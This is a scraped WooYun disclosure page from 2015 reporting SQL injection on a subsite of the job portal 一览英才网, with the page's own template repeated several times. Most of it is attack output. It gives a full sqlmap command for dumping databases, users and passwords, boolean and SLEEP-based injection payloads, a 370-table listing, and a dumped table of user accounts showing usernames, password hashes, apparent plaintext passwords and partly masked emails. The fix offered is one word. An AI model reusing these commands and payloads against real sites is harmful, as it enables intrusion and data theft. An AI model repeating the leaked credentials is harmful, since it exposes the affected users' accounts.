一览英才网分站存在SQL注入漏洞 | wooyun-2015-0150253| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150253

漏洞标题：一览英才网分站存在SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-10-29 14:47

修复时间：2015-12-17 19:30

公开时间：2015-12-17 19:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-29：细节已通知厂商并且等待厂商处理中
2015-11-02：厂商已经确认，细节仅向厂商公开
2015-11-12：细节向核心白帽子及相关领域专家公开
2015-11-22：细节向普通白帽子公开
2015-12-02：细节向实习白帽子公开
2015-12-17：细节向公众公开

简要描述：

一览英才网分站存在SQL注入漏洞，大量信息泄漏

详细说明：

1. 测试SQL注入漏洞

sqlmap.py -u "http://**.**.**.**/zhuanti/zhuanchang/index.php?zid=3981359526867737"--dbs --level 3 --risk 3 --random-agent --current-user --users --is-dba --password --threads=10

漏洞证明：

Parameter: zid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zid=3981359526867737 AND 3154=3154
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
current user:    'readJob1001only@**.**.**.**%'
current user is DBA:    False
database management system users [1]:
[*] 'readJob1001only'@'**.**.**.**%'
available databases [3]:
[*] information_schema
[*] job1001
[*] test

Parameter: zid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: zid=3981359526867737 AND 3154=3154
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
Database: job1001
[370 tables]
+-----------------------------+
| Area_navigation             |
| News_company                |
| Person_DelBk                |
| Person_DelBk_slave          |
| Trade_OtherLogin            |
| Trade_OtherLogin_Rel        |
| 20151024top10_company       |
| 20151024top10_vote          |
| apply_add                   |
| attachfile                  |
| authcode_mobile             |
| campus_companyApply         |
| campus_trade                |
| campusnews                  |
| cfavorite                   |
| cfavoriterecycle            |
| cfolder                     |
| chinavc_agents              |
| cmailbox                    |
| cmailbox_acceptfile         |
| cmailbox_c1                 |
| cmailbox_c10                |
| cmailbox_c100               |
| cmailbox_c101               |
| cmailbox_c102               |
| cmailbox_c103               |
| cmailbox_c104               |
| cmailbox_c105               |
| cmailbox_c106               |
| cmailbox_c107               |
| cmailbox_c108               |
| cmailbox_c109               |
| cmailbox_c11                |
| cmailbox_c110               |
| cmailbox_c111               |
| cmailbox_c112               |
| cmailbox_c113               |
| cmailbox_c114               |
| cmailbox_c115               |
| cmailbox_c116               |
| cmailbox_c117               |
| cmailbox_c118               |
| cmailbox_c119               |
| cmailbox_c12                |
| cmailbox_c120               |
| cmailbox_c13                |
| cmailbox_c14                |
| cmailbox_c15                |
| cmailbox_c16                |
| cmailbox_c17                |
| cmailbox_c18                |
| cmailbox_c19                |
| cmailbox_c2                 |
| cmailbox_c20                |
| cmailbox_c21                |
| cmailbox_c22                |
| cmailbox_c23                |
| cmailbox_c24                |
| cmailbox_c25                |
| cmailbox_c26                |
| cmailbox_c27                |
| cmailbox_c28                |
| cmailbox_c29                |
| cmailbox_c3                 |
| cmailbox_c30                |
| cmailbox_c31                |
| cmailbox_c32                |
| cmailbox_c33                |
| cmailbox_c34                |
| cmailbox_c35                |
| cmailbox_c36                |
| cmailbox_c37                |
| cmailbox_c38                |
| cmailbox_c39                |
| cmailbox_c4                 |
| cmailbox_c40                |
| cmailbox_c41                |
| cmailbox_c42                |
| cmailbox_c43                |
| cmailbox_c44                |
| cmailbox_c45                |
| cmailbox_c46                |
| cmailbox_c47                |
| cmailbox_c48                |
| cmailbox_c49                |
| cmailbox_c5                 |
| cmailbox_c50                |
| cmailbox_c51                |
| cmailbox_c52                |
| cmailbox_c53                |
| cmailbox_c54                |
| cmailbox_c55                |
| cmailbox_c56                |
| cmailbox_c57                |
| cmailbox_c58                |
| cmailbox_c59                |
| cmailbox_c6                 |
| cmailbox_c60                |
| cmailbox_c61                |
| cmailbox_c62                |
| cmailbox_c63                |
| cmailbox_c64                |
| cmailbox_c65                |
| cmailbox_c66                |
| cmailbox_c67                |
| cmailbox_c68                |
| cmailbox_c69                |
| cmailbox_c7                 |
| cmailbox_c70                |
| cmailbox_c71                |
| cmailbox_c72                |
| cmailbox_c73                |
| cmailbox_c74                |
| cmailbox_c75                |
| cmailbox_c76                |
| cmailbox_c77                |
| cmailbox_c78                |
| cmailbox_c79                |
| cmailbox_c8                 |
| cmailbox_c80                |
| cmailbox_c81                |
| cmailbox_c82                |
| cmailbox_c83                |
| cmailbox_c84                |
| cmailbox_c85                |
| cmailbox_c86                |
| cmailbox_c87                |
| cmailbox_c88                |
| cmailbox_c89                |
| cmailbox_c9                 |
| cmailbox_c90                |
| cmailbox_c91                |
| cmailbox_c92                |
| cmailbox_c93                |
| cmailbox_c94                |
| cmailbox_c95                |
| cmailbox_c96                |
| cmailbox_c97                |
| cmailbox_c98                |
| cmailbox_c99                |
| cmailbox_p1                 |
| cmailbox_p10                |
| cmailbox_p11                |
| cmailbox_p12                |
| cmailbox_p13                |
| cmailbox_p14                |
| cmailbox_p15                |
| cmailbox_p2                 |
| cmailbox_p3                 |
| cmailbox_p4                 |
| cmailbox_p5                 |
| cmailbox_p6                 |
| cmailbox_p7                 |
| cmailbox_p8                 |
| cmailbox_p9                 |
| cmailboxrecycle             |
| cmailstext_100              |
| cmailstext_101              |
| cmailstext_102              |
| cmailstext_103              |
| cmailstext_104              |
| cmailstext_105              |
| cmailstext_106              |
| cmailstext_107              |
| cmailstext_108              |
| cmailstext_109              |
| cmailstext_110              |
| cmailstext_111              |
| cmailstext_111_20150622     |
| cmailstext_112              |
| cmailstext_113              |
| cmailstext_114              |
| cmailstext_115              |
| cmailstext_116              |
| cmailstext_117              |
| cmailstext_118              |
| cmailstext_119              |
| cmailstext_120              |
| cmailstext_121              |
| cmailstext_122              |
| cmailstext_123              |
| cmailstext_124              |
| cmailstext_125              |
| cmailstext_126              |
| cmailstext_127              |
| cmailstext_128              |
| cmailstext_129              |
| cmailstext_130              |
| cmailstext_131              |
| cmailstext_132              |
| cmailstext_133              |
| cmailstext_134              |
| cmailstext_135              |
| cmailstext_136              |
| cmailstext_137              |
| cmailstext_138              |
| cmailstext_139              |
| cmailstext_140              |
| cmailstext_999              |
| common_zwmc                 |
| common_zwmc_trade           |
| company                     |
| companyEmalDealRepeat       |
| companyImage                |
| company_canlogin            |
| company_contact             |
| company_daishan             |
| company_locked              |
| company_rborder             |
| company_resume_temp         |
| company_resume_temp_recycle |
| company_score_class         |
| company_score_logs          |
| company_searcher_type       |
| company_slave               |
| company_version             |
| company_zp_searcher         |
| companynews                 |
| companyserver               |
| companyserver_fankui        |
| companyserver_sub           |
| companyzwnumlog             |
| deptRel                     |
| email_company_temp          |
| fujian                      |
| groupRel                    |
| gzpinpai_feedback           |
| gzpinpai_reply              |
| gzpinpai_server             |
| gzpinpai_server_sub         |
| hotJobs                     |
| hrinfo                      |
| hrsalaryinfo                |
| hunter_job                  |
| hunter_resume               |
| hunter_resume_log           |
| ip_address                  |
| ip_locked                   |
| jifen_gift_role             |
| jifen_type                  |
| mac_login                   |
| map                         |
| menudefine                  |
| menudefine_new              |
| menudefine_new_other        |
| notice                      |
| noticeAppend                |
| noticeImages                |
| noticeMenu                  |
| noticeTemplate              |
| oem                         |
| personRecentlySearch        |
| person_cer                  |
| person_join                 |
| person_recommend            |
| personen                    |
| pfavorite                   |
| pmailbox                    |
| pmailbox_mailtext           |
| question                    |
| region                      |
| region_daili_apply          |
| reply                       |
| resume_template             |
| role_new                    |
| role_new_other              |
| role_type                   |
| roledata                    |
| roledata_new                |
| roledata_new_other          |
| roletotype                  |
| safety_help                 |
| school                      |
| school_all                  |
| school_dump                 |
| school_trade                |
| schoolcampay                |
| schooldown                  |
| schoolnews                  |
| shop_admin                  |
| shop_admin_other            |
| stat_region_fp              |
| sysmenu                     |
| sysmenu_new                 |
| sysmenu_new_other           |
| system_dept                 |
| system_dept_user            |
| tjPerson                    |
| top10_activity              |
| top10_comm                  |
| top10_company               |
| top10_vote                  |
| total_trade                 |
| trade                       |
| tradeClass                  |
| trade_aboutus               |
| trade_area                  |
| trade_class                 |
| trade_index_guzhu           |
| trade_index_mingqi          |
| trade_index_navigator       |
| trade_index_xjh             |
| trade_region                |
| trade_rel_show              |
| trade_zt_index              |
| trade_zw                    |
| trade_zw_new                |
| trade_zw_person             |
| trade_zw_person_bak         |
| trade_zw_position_job_index |
| trade_zw_position_person    |
| trade_zw_position_rel       |
| trade_zw_position_remark    |
| trade_zw_position_suggest   |
| trade_zw_post_nav           |
| trade_zw_rel_wenku          |
| trade_zw_step               |
| tradecampus                 |
| vipAppend                   |
| vipAppendBasic              |
| vipImagesType               |
| vipMenu                     |
| viptemplate                 |
| viptemplateType             |
| vvipDefaultImg              |
| vvipDefaultImgType          |
| yilanbi_logs                |
| yqlj                        |
| zp                          |
| zpJob1001                   |
| zpTj                        |
| zp_checklog                 |
| zp_hunter                   |
| zp_slave                    |
| zph_class                   |
| zph_image                   |
| zph_jobs                    |
| zph_list                    |
| zph_logo                    |
| zph_masterTable             |
| zph_media                   |
| zph_slaveTable              |
| zph_template                |
| zph_xinwen                  |
| zph_yg                      |
| zphzcActive                 |
| zphzcColumn                 |
| zphzcZphList                |
| zprecycle                   |
| zptxt                       |
| zptxt_master                |
| zptxt_salve                 |
| zw                          |
| zw_hot                      |
| zw_new                      |
| zw_person_gj                |
| zw_zwdesc                   |
| zwfolder                    |
| zwlb                        |
| zwlb_new                    |
| zwlb_share                  |
| zwlbrep                     |
| zwlbrep_new                 |
| zy_zw_match                 |
| zyclass                     |
| zyclass_new                 |
| zyrep                       |
| zyrep_new                   |
| zytemp                      |
| zytemp_new                  |
+-----------------------------+

Parameter: zid (GET)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload: zid=3981359526867737 AND 3154=3154
 Type: AND/OR time-based blind
 Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
 Payload: zid=3981359526867737 AND (SELECT * FROM (SELECT(SLEEP(5)))iStq)
---
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
Database: job1001
Table: Person_DelBk
[11 entries]
+---------------+-----------------------------------------------+--------------+--------+---------------------------+
| uname | pwd | password | certId | email |
+---------------+-----------------------------------------------+--------------+--------+---------------------------+
| jfjl | F$SfcB9PV_#S | 971007 | 0 | dhjwdd@**.**.**.** |
| lsc198971cs | f029c3a60e67928b1e6542a2725dd2a4 | wo198971cs | 0 | 527458379@**.**.**.** |
| 冬日雾雨 | f05154d221d3ff793fe52c1df0901fd4 | 9716810506 | 0 | <blank> |
| liliang0909 | f22eecde7c0861ff995ab7547934d8a5 | 09nianfadaca | 0 | dandan1668@**.**.**.** |
| zhoutao123456 | f2e2258a1df5c4dbad2822dea034df3b | 2510290 | 0 | www.zhoutao123321@sina.co |
| Befbrinekniny | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | hyclerolo@yalta.krim.ws |
| Coghoimeemefe | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | hyclerolo@yalta.krim.ws |
| JarPeamma | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | hyclerolo@yalta.krim.ws |
| Pypesters | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | hyclerolo@yalta.krim.ws |
| Acireelia | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | hyclerolo@yalta.krim.ws |
| Vorsmanna | f31bd5e0ca9218bf4550133c230c8d35 (7W5IAuj575) | 7W5IAuj575 | 0 | hyclerolo@yalta.krim.ws |
+---------------+-----------------------------------------------+--------------+--------+---------------------------+

表太多就不一个一个刷了

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2015-11-02 19:29

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150253

漏洞标题：一览英才网分站存在SQL注入漏洞

相关厂商：一览英才网

漏洞作者：路人甲

提交时间：2015-10-29 14:47

修复时间：2015-12-17 19:30

公开时间：2015-12-17 19:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150253

漏洞标题：一览英才网分站存在SQL注入漏洞

相关厂商：一览英才网

漏洞作者： 路人甲

提交时间：2015-10-29 14:47

修复时间：2015-12-17 19:30

公开时间：2015-12-17 19:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0150253"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云